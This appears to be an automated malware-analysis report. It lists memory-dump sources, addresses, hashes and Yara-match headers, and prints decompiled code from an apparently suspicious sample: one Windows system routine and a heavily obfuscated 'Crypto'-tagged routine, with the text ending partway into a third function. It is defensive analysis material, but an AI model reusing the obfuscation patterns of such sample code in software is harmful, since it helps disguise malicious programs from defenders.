0x00000000
0x030429e3
0x030429e3
0x030429e3
0x00000000
0x030429e3
0x030429dd
0x00000000
0x030429db
0x030429e6
0x030429e9
0x030429eb
0x030429ed
0x030429f3
0x030429f5
0x030429f8
0x030429fa
0x03042a97
0x03042a9a
0x03042a9d
0x03042add
0x00000000
0x03042a9f
0x03042aa2
0x03042aa5
0x03042aa8
0x03042aab
0x03085cab
0x03085caf
0x03085cc5
0x03085cda
0x03085cdc
0x03085cdf
0x03085ce5
0x00000000
0x03085ceb
0x03085ced
0x03085cee
0x00000000
0x03085cee
0x03085cb1
0x03085cb4
0x03085cb9
0x03085cbb
0x00000000
0x03085cbd
0x03085cbd
0x00000000
0x03085cbd
0x03085cbb
0x03042ab1
0x03042ab1
0x03042ac4
0x03042ac6
0x03042ac6
0x00000000
0x03042ac6
0x03042aab
0x00000000
0x03042a00
0x03042a09
0x03042a0e
0x03042a21
0x03042a24
0x03042a35
0x03042a3a
0x03042a3d
0x03042a42
0x03042a59
0x03042a59
0x03042a5c
0x03042a5f
0x03042a5f
0x030429fa
0x030429f3
0x03042a64
0x03042a64
0x03042a6b
0x03042a6b
0x03042a6d
0x03042a72
0x03042a72
0x00000000

Strings

PATH, xrefs: 03042642, 03042691

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 67fc2acf9fea099f59596ab895b4be368b65cb0ee392ab660e0a129e02f81bfa
Instruction ID: ddcf320601a64c384a433f789885ddcb36419dd6557361e4226be46a78d8d72c
Opcode Fuzzy Hash: 67fc2acf9fea099f59596ab895b4be368b65cb0ee392ab660e0a129e02f81bfa
Instruction Fuzzy Hash: CDC191B5E02219DBCB14DF99D980BEEB7F9FF48700F084829F841AB250D774AA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0304FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0304FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0302EEF0(0x3107b60);
					_t134 =  *0x3107b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x3107b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x3107b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03026D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E030276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E030B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0301B150();
													}
													_t116 = E030B6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E030275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x3108638; // 0x141c0b0
																	_t122 = L030238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E030276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E030276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0304FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L030270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0304FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0304FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0304FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0304FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0304FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x3107b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x3107b84 = _t75;
						_t73 = E0302EB70(_t134, 0x3107b60);
						if( *0x3107b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0302FF60( *0x3107b20);
							}
						}
						goto L5;
					}
				}
			}

0x0304fab0
0x0304fab2
0x0304fab3
0x0304fab4
0x0304fabc
0x0304fac0
0x0304fb14
0x0304fb17
0x0304fac2
0x0304fac8
0x0304facd
0x0304fad3
0x0304fad3
0x0304fadd
0x0304fb18
0x0304fb1b
0x0304fb1d
0x0304fb1e
0x0304fb1f
0x0304fb20
0x0304fb21
0x0304fb22
0x0304fb23
0x0304fb24
0x0304fb25
0x0304fb26
0x0304fb27
0x0304fb28
0x0304fb29
0x0304fb2a
0x0304fb2b
0x0304fb2c
0x0304fb2d
0x0304fb2e
0x0304fb2f
0x0304fb3a
0x0304fb3b
0x0304fb3e
0x0304fb41
0x0304fb44
0x0304fb47
0x0304fb4a
0x0304fb4d
0x0304fb53
0x0308bdcb
0x0308bdcb
0x0304fb59
0x0304fb5b
0x0304fb5b
0x0304fb5e
0x0308bdd5
0x0308bdd8
0x00000000
0x0308bdda
0x00000000
0x0308bdda
0x0304fb64
0x0304fb64
0x0304fb64
0x0304fb67
0x0304fb6e
0x0304fb70
0x0304fb72
0x00000000
0x0304fb78
0x0304fb7a
0x0304fb7a
0x0304fb7d
0x0304fb80
0x0308bddf
0x0308bde1
0x00000000
0x0308bde3
0x00000000
0x0308bde3
0x0304fb86
0x0304fb86
0x0304fb86
0x0304fb8b
0x0304fb90
0x0304fb92
0x0304fb94
0x0304fb9a
0x0304fb9b
0x0304fba1
0x0308bde8
0x0308bdeb
0x0308bded
0x0308beb5
0x0308beb5
0x0308bebb
0x0308bebd
0x0308bec3
0x0308bed2
0x0308bedd
0x0308bedd
0x0308beed
0x00000000
0x0308bdf3
0x0308bdfe
0x0308be06
0x0308be0b
0x0308be0d
0x0308be0f
0x0308be14
0x0308be19
0x0308be20
0x0308be25
0x0308be27
0x0308be35
0x0308be39
0x0308be46
0x0308be4f
0x0308be54
0x0308be56
0x0308bef8
0x0308bef8
0x00000000
0x0308be5c
0x0308be5c
0x0308be60
0x00000000
0x0308be66
0x0308be66
0x0308be7f
0x0308be84
0x0308be87
0x0308be89
0x0308be8b
0x0308be99
0x0308be9d
0x0308bea0
0x0308beac
0x0308beaf
0x0308beb1
0x0308beb3
0x0308beb3
0x00000000
0x0308bea2
0x0308bea2
0x00000000
0x0308bea2
0x0308be8d
0x0308be8d
0x0308be92
0x00000000
0x0308be92
0x0308be8b
0x0308be60
0x0308be3b
0x0308be3b
0x0308be3e
0x00000000
0x0308be40
0x0308be40
0x0308be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0308be44
0x0308be3e
0x0308be29
0x0308be29
0x00000000
0x0308be29
0x0308be27
0x00000000
0x0304fba7
0x0304fba7
0x0304fbab
0x0308bf02
0x0304fbb1
0x0304fbb1
0x0304fbb8
0x0304fbbd
0x0304fbbd
0x0304fbbf
0x0304fbbf
0x0304fbc5
0x0304fbcb
0x0304fbf8
0x0304fbf8
0x0304fbfa
0x00000000
0x0304fc00
0x0304fc00
0x0304fc03
0x00000000
0x0304fc09
0x0304fc09
0x0304fc0f
0x0304fc15
0x0304fc23
0x0304fc23
0x0304fc25
0x0304fc27
0x0304fc75
0x0304fc7c
0x0304fc84
0x00000000
0x0304fc29
0x0304fc29
0x0304fc2d
0x0304fc30
0x0308bf0f
0x00000000
0x0304fc36
0x0304fc38
0x0304fc3b
0x0304fc41
0x0308bf17
0x0308bf19
0x0308bf48
0x0308bf4b
0x00000000
0x0308bf1b
0x0308bf22
0x0308bf24
0x0308bf26
0x00000000
0x0308bf2c
0x0308bf37
0x0308bf39
0x0308bf3b
0x00000000
0x0308bf41
0x0308bf41
0x0308bf41
0x0308bf41
0x0308bf45
0x00000000
0x0308bf45
0x0308bf3b
0x0308bf26
0x00000000
0x0304fc47
0x0304fc47
0x0304fc49
0x0304fcb2
0x0304fcb4
0x0304fcb6
0x0304fcdc
0x0304fcdc
0x00000000
0x0304fcb8
0x0304fcc3
0x0304fcc5
0x0304fcc7
0x00000000
0x0304fcc9
0x0304fcc9
0x0304fccd
0x00000000
0x0304fccd
0x0304fcc7
0x00000000
0x0304fc4b
0x0304fc4b
0x0304fc4e
0x0304fc4e
0x0304fc51
0x0304fc51
0x0304fc54
0x0304fc5a
0x0304fc5c
0x0304fc5f
0x0304fc61
0x0304fc63
0x0304fc65
0x0304fc67
0x0304fc6e
0x0304fc72
0x0304fc72
0x0304fc72
0x0304fc72
0x0304fc67
0x0304fc61
0x00000000
0x0304fc5a
0x0304fc49
0x0304fc41
0x0304fc30
0x0304fc27
0x0304fc03
0x0304fbcd
0x0304fbd3
0x0304fbd9
0x0304fbdc
0x0304fbde
0x0304fc99
0x0304fc9b
0x0304fc9d
0x0304fcd5
0x0304fcd5
0x0304fc89
0x0304fc89
0x00000000
0x0304fc9f
0x0304fc9f
0x0304fca3
0x00000000
0x0304fca3
0x00000000
0x0304fbe4
0x0304fbe4
0x0304fbe4
0x0304fbe4
0x0304fbe9
0x0304fbf2
0x00000000
0x0304fbf2
0x0304fbde
0x0304fbcb
0x0304fbab
0x0304fc8b
0x0304fc8b
0x0304fc8c
0x0304fb80
0x0304fb72
0x0304fb5e
0x0304fc8d
0x0304fc91
0x0304fadf
0x0304fadf
0x0304fae1
0x0304fae4
0x0304fae7
0x0304faec
0x0304faf8
0x0304fb00
0x0304fb07
0x0304fb0f
0x0304fb0f
0x0304fb07
0x00000000
0x0304faf8
0x0304fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0308BE0F

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 7a876d847290805d4b513ec31a5b63f45c0f6798d707c5cc6122c74bc7d4fb13
Instruction ID: 893d9101638ec5b89e54d911938328b3cbf9af1109c3197f272b4bc641583e5b
Opcode Fuzzy Hash: 7a876d847290805d4b513ec31a5b63f45c0f6798d707c5cc6122c74bc7d4fb13
Instruction Fuzzy Hash: D7A104B5B027068FDB65EF68C550BBEB7E5AF48710F0885B9D846DB680DB30DA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB27, Relevance: 1.5, Strings: 1, Instructions: 241
COMMONCrypto

Download Yara Rule

C-Code - Quality: 35%

			E0041CB27(signed char __eax, signed int __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				void* _v3;
				char _v1838127102;
				void* _v2125367791;
				signed char _t19;
				signed int _t21;
				signed int _t26;
				signed int _t27;
				signed char _t32;
				signed int _t39;
				signed int _t40;
				signed int _t45;
				signed int _t47;
				void* _t49;
				void* _t57;
				signed int _t61;
				signed int _t65;
				signed int _t66;
				signed int _t76;
				void* _t80;
				void* _t83;

				_t47 = __edi;
				_t39 = __edx;
				_t32 = __ecx;
				_t26 = __ebx;
				_t19 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													L1:
													asm("rcl dword [0x7ca21ef1], 0xa7");
													asm("adc ebx, [0x9ba6f9b8]");
													asm("adc al, [0x4598d4b0]");
													 *0x50eb1c39 =  *0x50eb1c39 &  *0xbc8921cd;
													_pop( *0xc809c1d4);
													_t27 = _t26 +  *0xa38e89e0;
													_pop(_t65);
													 *0xe7548c04 =  *0xe7548c04 | _t27;
													_t39 = _t39 ^ 0x000000b6;
													_pop(_t49);
													 *0xc45cbbed =  *0xc45cbbed << 0xa4;
													_t66 = _t65 &  *0x9d5c739;
													 *0x6e95a33c =  *0x6e95a33c >> 0xe0;
													asm("scasb");
													 *0xcfa13f4 =  *0xcfa13f4 + _t49;
													asm("stosb");
													_t76 = _t76 - 0x00000001 |  *0x6a5e6639;
													asm("movsw");
													asm("sbb [0xc91c52e6], cl");
													_t26 = _t27 ^  *0xeda6ffb8;
													asm("ror byte [0x9877a938], 0x30");
													_pop( *0xfc6f4a9e);
													 *0x1566bf61 =  *0x1566bf61 + _t76;
													 *0x988f6962 =  *0x988f6962 & _t66;
													_t32 = (_t32 &  *0x58f12961) - 1;
													 *0x4d055222 =  *0x4d055222 & _t26;
													_t47 = ( *0x54ea6b6b * 0x0000c775 &  *0x78326b13) -  *0xe9593bb;
													asm("adc esp, [0x1946a06e]");
													_t19 = _t19 + 1 - 1;
													 *0x2fbf41e6 =  *0x2fbf41e6 ^ _t32;
												} while ( *0x2fbf41e6 >= 0);
												 *0x9b8ff579 =  *0x9b8ff579 ^ _t32;
												 *0x729a86ef =  *0x729a86ef ^ _t66;
												 *0xb71c30a0 =  *0xb71c30a0 << 0xe2;
												asm("scasb");
											} while ( *0xb71c30a0 <= 0);
											_t26 = _t26 | 0xd751b30b;
											 *0xbd793fb4 =  *0xbd793fb4 & _t19;
											_t47 =  *0x4d10e07e * 0x00003660 | 0xaa8c35d4;
											 *0x8bd54fbb =  *0x8bd54fbb + _t47;
											 *0x6ce99d33 = _t47;
											_pop(_t76);
											 *0x17f11a89 = _t76;
											 *0xe66b0982 =  *0xe66b0982 & _t39;
											_t32 = (_t32 ^ 0x000000b4 |  *0xf6644239) + 0xe6;
											asm("adc esp, [0xb21adfce]");
											asm("adc [0x8e29909c], edx");
											asm("sbb eax, [0x5d7d8c06]");
											_t40 = _t19;
											asm("sbb [0x78cb8cfb], ecx");
											asm("adc [0xd7b65904], bh");
											asm("scasb");
											asm("rcl dword [0x6d09f091], 0xa5");
											 *0xb965116c =  *0xb965116c << 0x3e;
											_t39 = _t40 ^ 0xb4ef0e6c;
											asm("rol byte [0x1f04970a], 0x11");
											 *0xb03daf38 =  *0xb03daf38 | _t19;
										} while ( *0xb03daf38 > 0);
										asm("lodsb");
										_t21 = _t19 +  *0xa3aea8ce;
										asm("stosd");
										 *0x9d827a8b =  *0x9d827a8b & _t76;
										L1();
										 *0x8e588de8 = _t32;
										 *0xe9908007 =  *0xe9908007 >> 0xe4;
										_t57 = _t32;
										asm("adc ebp, [0xb6e59b95]");
										_pop(_t80);
										_t76 = _t80 + 1;
										 *0xa94102bd =  *0xa94102bd >> 0x59;
										 *0x6769bba3 =  *0x6769bba3 - _t76;
										 *0x6fe627c9 =  *0x8e588de8;
										_push( *0xd562949f);
										_push( *0x4a45b885);
										asm("adc [0x2930ecb1], ch");
										asm("adc edx, [0x7e47858f]");
										_t26 = 0x2505affe +  *0x941e497f * 0x76b9 - 1;
										 *0x618f0512 = _t21;
										asm("adc esp, [0x677a2a9a]");
										 *0xd30b2ce5 =  *0xd30b2ce5 & _t26;
										_t19 = _t21 ^ 0x9329df9d;
										_push( *0x3c825acc);
										_t39 = (_t39 ^  *0x6bc978ef) & 0xa7711c64 &  *0x5d5e1624;
										_push( *0x942d6e6b * 0x75e2);
										 *0x32bff415 =  *0x32bff415 >> 0x3d;
										asm("sbb [0x116893cb], esp");
										asm("adc ebp, [0x35c6706]");
										 *0x6c7b6982 =  *0x6c7b6982 + _t19;
										_pop(_t47);
										 *0xbf05c908 =  *0xbf05c908 >> 0x4f;
										_pop(_t32);
									} while ( *0x6c7b6982 >= 0);
									_t26 = _t26 & 0x45205771;
									asm("adc [0x2095c0e0], dl");
									 *0x22b97ceb =  *0x22b97ceb >> 0xd0;
									asm("movsw");
									_push(_t57);
								} while (_t26 != 0);
								 *0xcb00967a =  *0xcb00967a >> 0x71;
								 *0xe152e5b3 =  *0xe152e5b3 ^ _t19;
								 *0xff1521f0 =  *0xff1521f0 + _t39;
								asm("rcl byte [0x32fbc322], 0xb1");
								asm("sbb ecx, [0xf72823be]");
								_t76 = _t76 - 0x00000001 ^ 0xe5378c11;
								 *0x22bc08b1 =  *0x22bc08b1 | _t32;
								_pop(_t47);
							} while (0xb84a228d < 0);
							asm("rcr dword [0x6f470a78], 0x68");
							 *0xf7bb0a6d =  &_v1838127102;
							 *0x4429e8c =  *0x4429e8c >> 0xbd;
							asm("sbb [0x11fb066f], ebp");
							asm("adc edi, 0xf4b2719c");
							asm("stosd");
							asm("scasd");
							 *0xb77b0114 =  *0xb77b0114 + _t19;
							asm("adc al, [0x129482b5]");
							_t47 = _t47 + 0x2eb515cf;
							 *0x61f3d1c0 =  *0x61f3d1c0 << 0xcb;
							 *0xba6acdb5 =  *0xba6acdb5 << 0x61;
							 *0x2981e184 = _t32;
							 *0xd0c7e765 =  *0xf7bb0a6d +  *0xf2c5efea;
							asm("sbb ebp, [0xe4d26493]");
							_t26 = _t26 + 1;
							_push(_t39);
							asm("ror dword [0xd325e067], 0x46");
						} while (( *0xb790c5de & 0xc6f29e9a) != 0);
						 *0xaa1c1d7a =  *0xaa1c1d7a & _t19;
						 *0x82a801d1 =  *0x82a801d1 - _t76;
						asm("ror dword [0xa6b2a8a9], 0x3c");
					} while ( *0x82a801d1 >= 0);
					_t47 = _t47 - 1;
					asm("sbb dl, [0x7b2ed01c]");
					asm("adc [0x88ea97b2], ah");
					 *0x2ffd4ff1 = _t19;
					asm("rol dword [0xabab0dcc], 0x40");
					_push(_t30 +  *0xa4d2fbec);
					 *0xbf02e602 =  *0xbf02e602 | _t32;
					asm("ror byte [0x7a4febf2], 0xba");
					asm("movsw");
					_t45 = _t39 + 0x00000001 +  *0x2731d3b ^  *0x4388a51f;
					asm("movsb");
					_t61 = _t32;
					asm("sbb dh, 0x82");
					asm("adc dh, [0x82763838]");
					 *0x2c1241e6 =  *0x2c1241e6 << 0xa8;
					 *0xbcd09bea = _t45;
					 *0xb09f5591 =  *0xb09f5591 + (_t61 &  *0x260ca135);
					asm("rcr byte [0x7db5fce6], 0x15");
					_push( *0xb5471ca3);
					_t39 = _t45 -  *0xd5dfd519;
					_t26 =  *0x18f2d3e4;
					_t19 =  *0x2ffd4ff1 - 0x277b810b;
					asm("rcl byte [0x302eb1e2], 0x9f");
					 *0x4d353b10 =  *0x4d353b10 >> 0xc8;
					_t32 =  *0xd562699d;
					_t83 = _t76 -  *0xdfbbd464 -  *0x5ad1ec13;
					asm("lodsb");
					_t76 = _t83 - 1;
				} while (_t83 >= 0);
				asm("ror dword [0x78ebf73], 0x6f");
				 *0xa3bf8ba1 =  *0xa3bf8ba1 << 0x4c;
				asm("sbb edx, 0x7603b83f");
				asm("adc esp, [0x7ca11dfa]");
				asm("cmpsb");
				 *0x145a9796 =  *0x145a9796 << 0xda;
				 *0x4d3286c9 =  *0x4d3286c9 >> 0xf7;
				return _t19 | 0x0000009b;
			}

0x0041cb27
0x0041cb27
0x0041cb27
0x0041cb27
0x0041cb27
0x0041cb28
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb2a
0x0041cb31
0x0041cb3d
0x0041cb43
0x0041cb4a
0x0041cb50
0x0041cb56
0x0041cb57
0x0041cb63
0x0041cb66
0x0041cb67
0x0041cb6e
0x0041cb74
0x0041cb7b
0x0041cb88
0x0041cb9e
0x0041cbac
0x0041cbb2
0x0041cbb4
0x0041cbc6
0x0041cbcc
0x0041cbd3
0x0041cbd9
0x0041cbdf
0x0041cbe5
0x0041cbe6
0x0041cbf2
0x0041cbfe
0x0041cc04
0x0041cc05
0x0041cc05
0x0041cc11
0x0041cc1d
0x0041cc23
0x0041cc2a
0x0041cc2a
0x0041cc3e
0x0041cc44
0x0041cc50
0x0041cc56
0x0041cc5c
0x0041cc62
0x0041cc63
0x0041cc6f
0x0041cc75
0x0041cc78
0x0041cc7e
0x0041cc85
0x0041cc8b
0x0041cc8c
0x0041cc92
0x0041cc99
0x0041cca0
0x0041cca7
0x0041ccae
0x0041ccb7
0x0041ccbf
0x0041ccbf
0x0041ccdb
0x0041ccdc
0x0041cce2
0x0041cce3
0x0041cceb
0x0041ccf0
0x0041ccfc
0x0041cd09
0x0041cd0a
0x0041cd10
0x0041cd11
0x0041cd12
0x0041cd1f
0x0041cd2b
0x0041cd31
0x0041cd37
0x0041cd3d
0x0041cd49
0x0041cd4f
0x0041cd50
0x0041cd56
0x0041cd62
0x0041cd78
0x0041cd83
0x0041cd89
0x0041cd8f
0x0041cd96
0x0041cd9d
0x0041cda3
0x0041cda9
0x0041cdaf
0x0041cdb0
0x0041cdb7
0x0041cdb7
0x0041cdbe
0x0041cdc4
0x0041cdca
0x0041cdd1
0x0041cdd3
0x0041cdd3
0x0041cdda
0x0041cde1
0x0041cde7
0x0041cded
0x0041ce01
0x0041ce07
0x0041ce0d
0x0041ce19
0x0041ce20
0x0041ce2c
0x0041ce33
0x0041ce39
0x0041ce40
0x0041ce46
0x0041ce4c
0x0041ce4d
0x0041ce4e
0x0041ce5a
0x0041ce60
0x0041ce66
0x0041ce73
0x0041ce7a
0x0041ce8c
0x0041ce92
0x0041ce98
0x0041ce99
0x0041cea6
0x0041cea6
0x0041ceb3
0x0041cebf
0x0041cec5
0x0041cec5
0x0041cede
0x0041cee0
0x0041cee6
0x0041cef2
0x0041cef8
0x0041cf00
0x0041cf01
0x0041cf07
0x0041cf14
0x0041cf1d
0x0041cf23
0x0041cf29
0x0041cf31
0x0041cf39
0x0041cf3f
0x0041cf46
0x0041cf4c
0x0041cf52
0x0041cf59
0x0041cf5f
0x0041cf65
0x0041cf6b
0x0041cf6e
0x0041cf75
0x0041cf7c
0x0041cf82
0x0041cf88
0x0041cf89
0x0041cf89
0x0041cf90
0x0041cf97
0x0041cf9e
0x0041cfab
0x0041cfb1
0x0041cfbb
0x0041cfd3
0x0041cfe2

Strings

0, xrefs: 0041CCB4

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e5bdc45ab7e1848afd533c6fb4a17eb828a32a996822353d8454819a90abb50f
Instruction ID: 5ff5442084a6c3c55ae077f83103bd670070ff29ca58775a84d5ba670621d94e
Opcode Fuzzy Hash: e5bdc45ab7e1848afd533c6fb4a17eb828a32a996822353d8454819a90abb50f
Instruction Fuzzy Hash: B2C1433295D785CFD716DF38DE8AA913FB1F752320708028EC5A287496D3742066CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B99F, Relevance: 1.5, Strings: 1, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E0041B99F(signed int __eax, char __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				signed char _t24;
				signed int _t25;
				signed int _t46;
				signed int _t47;

